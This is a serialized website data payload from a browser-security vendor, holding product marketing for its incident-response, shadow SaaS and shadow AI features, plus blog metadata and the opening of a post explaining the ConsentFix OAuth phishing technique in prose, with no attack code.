SOAR","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fd00e39d3b6e346c296261d875cf55652%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=d00e39d3b6e346c296261d875cf55652&alt=media&optimized=true",{"large":954},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":956,"meta":957,"component":958,"responsiveStyles":960},"builder-8a0a8ea63f5d48dd8a6726f2d49cf0ca",{"previousId":716},{"name":346,"options":959,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":961},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":963,"meta":964,"component":965,"responsiveStyles":967},"builder-2df65c3f54334df2b26e7cb744886cdc",{"previousId":723},{"name":354,"options":966,"isRSC":118},{"darkMode":41},{"large":968},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":970,"component":971,"responsiveStyles":976},"builder-2c32c869efc2423ab69ef06b150e9f97",{"name":359,"tag":359,"options":972,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":973,"description":974,"image":975,"reverse":6},"\u003Ch2>See attacks unfold, not just their aftermath\u003C/h2>","\u003Cp>Attacks happen in the browser, not in logs. Push captures what traditional tools miss: what users clicked, what loaded, what was entered, and how attackers moved. 
That gives you real-world evidence, not just assumptions, when every second matters.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F36fc719bd1de4a38b916f4d25c81a26d",{"large":977},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":979,"meta":980,"component":981,"responsiveStyles":986},"builder-370e53c6016e432db01e9193a2ce90f6",{"previousId":739},{"name":373,"options":982,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":983,"description":984,"reverse":41,"image":985},"\u003Ch2>Investigate faster with high-fidelity data\u003C/h2>","\u003Cp>Reconstructing an incident shouldn’t feel like guesswork. Push records detailed telemetry from inside the browser: page loads, credential inputs, DOM changes, session activity, user behavior. It’s structured, exportable, and ready to plug into your investigation workflows, so you can move fast without digging through proxy logs or relying on user reports.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa6adda040e684e67a8d68a55c5ce5f6d",{"large":987},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":384,"marginTop":384},{"@type":106,"@version":107,"id":989,"meta":990,"component":991,"responsiveStyles":996},"builder-a7f3767a8d184bd08fb24520bf210e95",{"previousId":749},{"name":373,"options":992,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":993,"description":994,"reverse":6,"image":995},"\u003Ch2>Contain and respond in real time\u003C/h2>","\u003Cp>When something looks off, Push doesn’t just alert you, it gives you options. Guide users with in-browser prompts. Terminate sessions. Trigger SOAR workflows. Enrich SIEM alerts. 
Push gives you the context and control to stop spread before it starts.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb3dedeed5aba4847a2c2d22e10d0ec12",{"large":997},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":999,"meta":1000,"component":1001,"responsiveStyles":1006},"builder-b92036ee0ece4b32acdbdcc7c377366b",{"previousId":759},{"name":373,"options":1002,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":1003,"description":1004,"reverse":41,"image":1005},"\u003Ch2>Prevent the next one\u003C/h2>","\u003Cp>Push helps you respond fast, but it also helps you fix what went wrong. It surfaces misconfigurations and risky behaviors that made the attack possible in the first place, then guides users in-browser to remediate. One tool. Full loop. No loose ends.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fc1ecc2d5d3814b62b072fac01827ff96",{"large":1007},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":1009,"meta":1010,"component":1011,"responsiveStyles":1013},"builder-5e8ae39655274de89da32ab573a2525a",{"previousId":769},{"name":354,"options":1012,"isRSC":118},{"darkMode":6},{"large":1014},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1016,"component":1017,"responsiveStyles":1019},"builder-dfd6850cfb4741d2b8a0c16c2780f00a",{"name":416,"tag":416,"options":1018,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":1020},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1022,"@type":106,"tagName":131,"properties":1023,"responsiveStyles":1024},"builder-pixel-z197gdgcmu",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"lar
ge":1025},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1027},{"path":37,"query":1028},{},{},1770892908052,1745427419274,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb07017bfd318431690a5bb35bda35b99",[],{"kind":438,"breakpoints":1035,"originalContentId":681,"winningTest":118,"lastPreviewUrl":1036,"hasLinks":6,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"https://pushsecurity.com/uc/incident-response?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=a9d5556e77f84a37b5bd52310a7110c1&builder.overrides.a9d5556e77f84a37b5bd52310a7110c1=a9d5556e77f84a37b5bd52310a7110c1&builder.overrides.use-case-page:/uc/incident-response=a9d5556e77f84a37b5bd52310a7110c1&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"createdDate":1038,"id":1039,"name":1040,"modelId":261,"published":13,"query":1041,"data":1044,"variations":1149,"lastUpdated":1150,"firstPublished":1151,"testRatio":33,"screenshot":1152,"createdBy":34,"lastUpdatedBy":674,"folders":1153,"meta":1154,"rev":440},1746122471259,"5f118e24433d46ceb79f5099987156d7","Shadow SaaS",[1042],{"@type":264,"property":265,"operator":266,"value":1043},"/uc/shadow-saas",{"seoTitle":1045,"seoDescription":1046,"customFonts":1047,"fontAwesomeIcon":1052,"title":1053,"jsCode":37,"tsCode":37,"blocks":1054,"url":1043,"state":1146},"Find and secure shadow SaaS","See and 
control shadow SaaS in the browser.",[1048],{"kind":273,"variants":1049,"files":1050,"family":272,"version":274,"subsets":1051,"lastModified":275,"category":295,"menu":296},[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"300italic":293,"500italic":292,"regular":290,"900italic":286,"italic":289,"100italic":288,"200italic":291,"600italic":294,"700italic":287,"800italic":285},[298,299],"faShieldCheck","Secure shadow SaaS",[1055,1141],{"@type":106,"@version":107,"tagName":323,"id":1056,"meta":1057,"children":1058},"builder-04da805c4cd34652a2db452fcda52e1d",{"previousId":935},[1059,1075,1082,1089,1098,1108,1118,1128,1135],{"@type":106,"@version":107,"id":1060,"meta":1061,"component":1062,"responsiveStyles":1073},"builder-830d414faeaf41439142f9157e8288c8",{"previousId":939},{"name":327,"options":1063,"isRSC":118},{"title":1045,"description":1064,"points":1065,"video":1072},"\u003Cp>SaaS sprawl is one of today’s fastest-growing security blind spots because most tools monitor around the edges. Push sees it at the source, in the browser, revealing every app users access, flagging risky tools, and helping you shut down exposure before it leads to a breach. No guesswork. No nasty surprises. 
Just real-time visibility and control.\u003C/p>",[1066,1068,1070],{"item":1067},"Discover every SaaS app users access, managed or not",{"item":1069},"Spot accounts with weak security postures like missing MFA, unmanaged access, and no SSO",{"item":1071},"Control usage with in-browser prompts, blocks, and security guardrails","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F3e4eece318d04d6586e691d59d0741cf%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=3e4eece318d04d6586e691d59d0741cf&alt=media&optimized=true",{"large":1074},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":1076,"meta":1077,"component":1078,"responsiveStyles":1080},"builder-cd7833f966cb4c7e8adf0d6c979414a6",{"previousId":956},{"name":346,"options":1079,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":1081},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":1083,"meta":1084,"component":1085,"responsiveStyles":1087},"builder-49d720b45430454e8b08c526f267c19f",{"previousId":963},{"name":354,"options":1086,"isRSC":118},{"darkMode":41},{"large":1088},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1090,"component":1091,"responsiveStyles":1096},"builder-3dde0bf6c8544e5e9ab41b18a9d68034",{"name":359,"tag":359,"options":1092,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":1093,"description":1094,"image":1095,"reverse":6},"\u003Ch2>Use your browser to curb Saas Sprawl\u003C/h2>","\u003Cp>Shadow SaaS isn’t hiding in your network, it’s in your browser. From AI tools to unsanctioned file-sharing sites, security risks live in the apps your users sign into every day. 
Push maps your organization's true SaaS footprint in real time, exposing apps and accounts with unmanaged access, poor authentication, or no security oversight.\u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fb6811a214c7949b6bbe0b9a3bca62efd",{"large":1097},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1099,"meta":1100,"component":1101,"responsiveStyles":1106},"builder-e2420451ccdc4f088d0a4904cff45935",{"previousId":979},{"name":373,"options":1102,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":1103,"description":1104,"reverse":41,"image":1105},"\u003Ch2>Discover hidden SaaS usage\u003C/h2>","\u003Cp>Push captures live browser telemetry across every tab and session. Whether a user signs into a sanctioned app with a personal account or tries a new AI plugin, you’ll see it in real time, with no integrations or manual tagging.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe16e301f9af94665b95d98232a863d8a",{"large":1107},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":384,"marginTop":384},{"@type":106,"@version":107,"id":1109,"meta":1110,"component":1111,"responsiveStyles":1116},"builder-b36de7fce7994beea9e58d94662e7166",{"previousId":989},{"name":373,"options":1112,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":1113,"description":1114,"reverse":6,"image":1115},"\u003Ch2>Spot risky access and unsafe usage\u003C/h2>","\u003Cp>Discovery is just the beginning. Push flags apps with risky traits, no MFA, no SSO, known vulnerabilities, or broad access scopes. 
You’ll know which tools introduce real risk, and which users are exposed so you can act with precision.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F6585f3c242da4d70ae3cb7d02f481bef",{"large":1117},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":1119,"meta":1120,"component":1121,"responsiveStyles":1126},"builder-dc366b5134684fe7a508edf8913103ea",{"previousId":999},{"name":373,"options":1122,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":1123,"description":1124,"reverse":41,"image":1125},"\u003Ch2>Close gaps before they grow\u003C/h2>","\u003Cp>Push turns insight into action. When risky SaaS use is detected, guide users to enable MFA, block high-risk apps, or apply in-browser guardrails automatically. All without deploying new infrastructure or managing dozens of integrations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe6d60b6d91414819bc6258a318f00557",{"large":1127},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":1129,"meta":1130,"component":1131,"responsiveStyles":1133},"builder-8708f6f0d8da4b3f9e17bf16cda70219",{"previousId":1009},{"name":354,"options":1132,"isRSC":118},{"darkMode":6},{"large":1134},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1136,"component":1137,"responsiveStyles":1139},"builder-8ff4b38d60534cf28cb523ab0f754875",{"name":416,"tag":416,"options":1138,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":1140},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1142,"@type":106,"tagName":131,"properties":1143,"responsiveStyles":1144},"builder-pixel-d1ul2kmxbed",{"src":133,"aria-hidden":134,"alt":37,"role":135,"w
idth":124,"height":124},{"large":1145},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1147},{"path":37,"query":1148},{},{},1770892936802,1746714967208,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F01bfb2304521412fbd2e1a1180904d40",[],{"originalContentId":919,"winningTest":118,"lastPreviewUrl":1155,"breakpoints":1156,"kind":438,"hasLinks":6,"hasAutosaves":6},"https://pushsecurity.com/uc/shadow-saas?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=5f118e24433d46ceb79f5099987156d7&builder.overrides.5f118e24433d46ceb79f5099987156d7=5f118e24433d46ceb79f5099987156d7&builder.overrides.use-case-page:/uc/shadow-saas=5f118e24433d46ceb79f5099987156d7&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},{"createdDate":1158,"id":1159,"name":1160,"modelId":261,"published":13,"query":1161,"data":1164,"variations":1268,"lastUpdated":1269,"firstPublished":1270,"testRatio":33,"screenshot":1271,"createdBy":34,"lastUpdatedBy":674,"folders":1272,"meta":1273,"rev":440},1764707470172,"b62629ce2f3741158d961cd10fe74b31","Shadow AI",[1162],{"@type":264,"property":265,"operator":266,"value":1163},"/uc/shadow-ai",{"fontAwesomeIcon":1165,"seoTitle":1166,"jsCode":37,"customFonts":1167,"title":1172,"tsCode":37,"seoDescription":1173,"blocks":1174,"url":1163,"state":1265},"faBrainCircuit","Secure AI 
native and AI enhanced apps. ",[1168],{"variants":1169,"category":295,"files":1170,"subsets":1171,"family":272,"kind":273,"menu":296,"lastModified":275,"version":274},[301,302,303,304,305,306,128,307,308,309,310,311,312,313,314,315,316,317],{"100":277,"200":278,"300":279,"500":280,"600":281,"700":282,"800":283,"900":284,"800italic":285,"regular":290,"700italic":287,"200italic":291,"italic":289,"500italic":292,"600italic":294,"300italic":293,"100italic":288,"900italic":286},[298,299],"Secure shadow AI","See and control shadow AI apps in the browser.",[1175,1260],{"@type":106,"@version":107,"tagName":323,"id":1176,"meta":1177,"children":1178},"builder-a6e5717a2c914d5695058e4ee201a05d",{"previousId":1056},[1179,1195,1202,1209,1219,1228,1237,1247,1254],{"@type":106,"@version":107,"id":1180,"meta":1181,"component":1182,"responsiveStyles":1193},"builder-3e0ed678683f4a0eb7aa00253cf263b2",{"previousId":1060},{"name":327,"options":1183,"isRSC":118},{"title":1172,"description":1184,"points":1185,"image":1192},"\u003Cp>Your employees are adopting AI faster than you can track it. From native features in corporate apps to unapproved shadow tools, it’s all happening in the browser. 
Push detects every AI interaction in real time, letting you categorize apps and enforce acceptable use policies in the browser.\u003C/p>",[1186,1188,1190],{"item":1187},"Map every AI tool used across your workforce",{"item":1189},"Review and classify apps by sensitivity, purpose, and policy status",{"item":1191},"Enforce AI usage rules directly in the browser","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F33cf153d920f4e389f3650253577cff7",{"large":1194},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":342},{"@type":106,"@version":107,"id":1196,"meta":1197,"component":1198,"responsiveStyles":1200},"builder-76968f8471d14893b8189d75b08fb426",{"previousId":1076},{"name":346,"options":1199,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":1201},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":350},{"@type":106,"@version":107,"id":1203,"meta":1204,"component":1205,"responsiveStyles":1207},"builder-b55b9d4bc5a649d8839ce7f6c2043d95",{"previousId":1083},{"name":354,"options":1206,"isRSC":118},{"darkMode":41},{"large":1208},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1210,"meta":1211,"component":1212,"responsiveStyles":1217},"builder-c3f38ef4d75d4989a29b5903175ed8a1",{"previousId":1090},{"name":359,"tag":359,"options":1213,"isRSC":118},{"darkMode":6,"maxWidth":363,"maxTextWidth":364,"title":1214,"description":1215,"image":1216,"reverse":6},"\u003Ch2>Use your browser to govern AI \u003C/h2>","\u003Cp>The AI footprint inside your company is bigger than you think. From text generators to meeting assistants and design copilots, employees test, adopt, and connect new tools constantly. 
Push shows you those tools and which users are accessing them, without relying on network scans or API integrations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F30b43bda6f1644c19478fb1efa20050c",{"large":1218},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1220,"meta":1221,"component":1222,"responsiveStyles":1226},"builder-90ee9cb9afc44e7f885523715bf51a53",{"previousId":1099},{"name":373,"options":1223,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":376,"title":1224,"description":1225,"reverse":41,"image":1115},"\u003Ch2>Discover every AI tool users touch\u003C/h2>","\u003Cp>Push captures live telemetry from the browser, identifying every AI-native and AI-enhanced application users access. You’ll know which corporate identities are connected, how data flows, and what new AI apps appear across your environment. \u003C/p>",{"large":1227},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":382,"paddingTop":384,"marginTop":384},{"@type":106,"@version":107,"id":1229,"meta":1230,"component":1231,"responsiveStyles":1235},"builder-9e44539fa53c4d8e87406036c921fc46",{"previousId":1109},{"name":373,"options":1232,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":389,"title":1233,"description":1234,"reverse":6,"image":1125},"\u003Ch2>Classify and manage AI risk\u003C/h2>","\u003Cp>For apps you choose to allow, Push lets you apply custom in-browser banners. You can bulk-select categories of AI tools and require users to read and acknowledge your acceptable use policy before they proceed. 
This creates an auditable trail and moves policy from an easy to forget document to an active, in-workflow control.\u003C/p>",{"large":1236},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":395},{"@type":106,"@version":107,"layerName":373,"id":1238,"meta":1239,"component":1240,"responsiveStyles":1245},"builder-44c1a891926f4bdeaaa37e90721fe6ac",{"previousId":1119},{"name":373,"options":1241,"isRSC":118},{"darkMode":6,"maxWidth":363,"imageMaxWidth":375,"textPaddingTop":400,"title":1242,"description":1243,"reverse":41,"image":1244},"\u003Ch2>Enforce your AI policy in the browser\u003C/h2>","\u003Cp>When an AI tool is deemed non-compliant or too risky, Push blocks it at the source. The block happens directly in the browser, preventing the user from accessing the site or submitting data. This gives you an immediate, powerful lever to stop data exfiltration and enforce a hard line on unacceptable risk.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa359ac1805af4e15a8a7f84632b9bb55",{"large":1246},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":406},{"@type":106,"@version":107,"id":1248,"meta":1249,"component":1250,"responsiveStyles":1252},"builder-dcc906f9cbe54dc68b3c672668e7a38f",{"previousId":1129},{"name":354,"options":1251,"isRSC":118},{"darkMode":6},{"large":1253},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":1255,"component":1256,"responsiveStyles":1258},"builder-d2d64780c31b4349bc75805b23a07e38",{"name":416,"tag":416,"options":1257,"isRSC":118},{"sectionHeading":37,"customClass":418},{"large":1259},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":1261,"@type":106,"tagName":131,"properties":1262,"responsiveStyles":1263},"builder-pixel-wxx9tk70r9p",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124
},{"large":1264},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":1266},{"path":37,"query":1267},{},{},1770892957225,1764950077593,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fe558b8b069884037a8e6904f7ecc029c",[],{"winningTest":118,"breakpoints":1274,"originalContentId":1039,"kind":438,"lastPreviewUrl":1275,"hasLinks":6,"hasAutosaves":41},{"xsmall":57,"small":39,"medium":40},"https://pushsecurity.com/uc/shadow-ai?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditCode%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CeditProjects%2CmodifyMcpServers%2CmodifyWorkflowIntegrations%2CmodifyProjectSettings%2CconnectCodeRepository%2CcreateProjects%2CindexDesignSystems%2CsendPullRequests&builder.user.role.name=Developer&builder.user.role.id=developer&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=b62629ce2f3741158d961cd10fe74b31&builder.overrides.b62629ce2f3741158d961cd10fe74b31=b62629ce2f3741158d961cd10fe74b31&builder.overrides.use-case-page:/uc/shadow-ai=b62629ce2f3741158d961cd10fe74b31&builder.options.includeRefs=true&builder.options.enrich=true&builder.options.locale=Default",{"_path":1277,"_dir":1278,"_draft":6,"_partial":6,"_locale":37,"sys":1279,"ogImage":118,"summary":1282,"title":1296,"subtitle":118,"metaTitle":1297,"synopsis":1298,"hashTags":118,"publishedDate":1299,"slug":1300,"tagsCollection":1301,"relatedBlogPostsCollection":1311,"authorsCollection":3404,"content":3412,"_id":4638,"_type":4639,"_source":4640,"_file":4641,"_stem":4642,"_extension":4639},"/blog/installfix","blog",{"id":1280,"publishedAt":1281},"7bG71Eo43crbIHKzczooVS","2026-03-16T11:36:37.630Z",{"json":1283},{"data":1284,"content":1285,"nodeType":1295},{},[1286],{"data":1287,"content":1288,"nodeType":1294}
,{},[1289],{"data":1290,"marks":1291,"value":1292,"nodeType":1293},{},[],"Attackers are distributing almost identical cloned sites of popular developer tools like Claude Code with fake install instructions via malicious search engine ads — tricking victims into installing infostealer malware instead. ","text","paragraph","document","InstallFix: How attackers are weaponizing malvertised install guides  ","InstallFix: Weaponizing malvertised install guides  ","Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.","2026-03-06T00:00:00.000Z","installfix",{"items":1302},[1303,1307],{"sys":1304,"name":1306},{"id":1305},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":1308,"name":1310},{"id":1309},"4ksQNCFeBf8H4QIORqpRLw","Detection & response",{"items":1312},[1313,2169,2765],{"__typename":1314,"sys":1315,"content":1317,"title":2151,"synopsis":2152,"hashTags":118,"publishedDate":2153,"slug":2154,"tagsCollection":2155,"authorsCollection":2161},"BlogPosts",{"id":1316},"4jcVFrvGBtVXpKU3gDMaa2",{"json":1318},{"nodeType":1295,"data":1319,"content":1320},{},[1321,1343,1350,1359,1418,1425,1432,1436,1446,1453,1460,1519,1528,1535,1560,1567,1570,1578,1585,1592,1599,1606,1613,1620,1626,1634,1641,1660,1680,1683,1691,1698,1705,1712,1720,1739,1746,1752,1760,1780,1800,1913,1916,1924,1931,1938,1941,1949,1956,1963,1970,2037,2068,2071,2079,2086,2093,2100,2107,2139,2145],{"nodeType":1294,"data":1322,"content":1323},{},[1324,1328,1339],{"nodeType":1293,"value":1325,"marks":1326,"data":1327},"In December, the Push Security research team discovered and blocked a brand new attack technique that we coined ",[],{},{"nodeType":1329,"data":1330,"content":1332},"hyperlink",{"uri":1331},"https://pushsecurity.com/blog/consentfix/",[1333],{"nodeType":1293,"value":1334,"marks":1335,"data":1338},"ConsentFix",[1336],{"type":1337},"underline",{},{"nodeType":1293,"value":1340,"marks":1341,"data":1342},". 
This technique merged ClickFix-style social engineering with OAuth consent phishing to hijack Microsoft accounts. ",[],{},{"nodeType":1294,"data":1344,"content":1345},{},[1346],{"nodeType":1293,"value":1347,"marks":1348,"data":1349},"We saw this attack running across a large network of compromised websites that attackers were injecting the malicious payload into, forming a large-scale campaign that was detected across multiple customer estates. ",[],{},{"nodeType":1351,"data":1352,"content":1358},"embedded-entry-block",{"target":1353},{"sys":1354},{"id":1355,"type":1356,"linkType":1357},"603MWDqc9NsqkklIkfGNZN","Link","Entry",[],{"nodeType":1294,"data":1360,"content":1361},{},[1362,1366,1375,1379,1388,1392,1401,1405,1414],{"nodeType":1293,"value":1363,"marks":1364,"data":1365},"ConsentFix got a pretty awesome response from the community in a very short space of time. Within days, ",[],{},{"nodeType":1329,"data":1367,"content":1369},{"uri":1368},"https://www.youtube.com/watch?v=AAiiIY-Soak",[1370],{"nodeType":1293,"value":1371,"marks":1372,"data":1374},"John Hammond shared a new and improved version of the technique",[1373],{"type":1337},{},{"nodeType":1293,"value":1376,"marks":1377,"data":1378}," that he’d spun up in his own lab, while security researchers from ",[],{},{"nodeType":1329,"data":1380,"content":1382},{"uri":1381},"https://medium.com/@nitashathakur/consentfix-poc-how-the-attack-works-end-to-end-4f8b656f977d",[1383],{"nodeType":1293,"value":1384,"marks":1385,"data":1387},"Microsoft",[1386],{"type":1337},{},{"nodeType":1293,"value":1389,"marks":1390,"data":1391},", ",[],{},{"nodeType":1329,"data":1393,"content":1395},{"uri":1394},"https://www.glueckkanja.com/en/posts/2025-12-31-vulnerability-consentfix",[1396],{"nodeType":1293,"value":1397,"marks":1398,"data":1400},"Glueck Kanja",[1399],{"type":1337},{},{"nodeType":1293,"value":1402,"marks":1403,"data":1404},", and 
",[],{},{"nodeType":1329,"data":1406,"content":1408},{"uri":1407},"https://msendpointmgr.com/2026/01/08/consentfix-quickfix/",[1409],{"nodeType":1293,"value":1410,"marks":1411,"data":1413},"other individual contributors",[1412],{"type":1337},{},{"nodeType":1293,"value":1415,"marks":1416,"data":1417}," all shared analysis and recommendations. ",[],{},{"nodeType":1294,"data":1419,"content":1420},{},[1421],{"nodeType":1293,"value":1422,"marks":1423,"data":1424},"In this blog, we’re sharing some new insights on the campaign, pulling together some of the top recommendations and resources shared across the community, and predicting what the future holds for this novel technique as it quickly enters the mainstream. ",[],{},{"nodeType":1294,"data":1426,"content":1427},{},[1428],{"nodeType":1293,"value":1429,"marks":1430,"data":1431},"First though, let’s quickly recap what ConsentFix is and how it works. ",[],{},{"nodeType":1433,"data":1434,"content":1435},"hr",{},[],{"nodeType":1437,"data":1438,"content":1439},"heading-1",{},[1440],{"nodeType":1293,"value":1441,"marks":1442,"data":1445},"ConsentFix 101",[1443],{"type":1444},"bold",{},{"nodeType":1294,"data":1447,"content":1448},{},[1449],{"nodeType":1293,"value":1450,"marks":1451,"data":1452},"ConsentFix is an attack technique that prompts the victim to share an OAuth authorization code with an attacker via a phishing page. The attacker then enters this code into a target application on their own device in order to complete the authorization handshake and take over the account. ",[],{},{"nodeType":1294,"data":1454,"content":1455},{},[1456],{"nodeType":1293,"value":1457,"marks":1458,"data":1459},"By hijacking OAuth, attackers can effectively bypass identity-layer controls like passwords and MFA — even phishing resistant authentication methods like passkeys have no impact on this attack, because it sidesteps the authentication process altogether. 
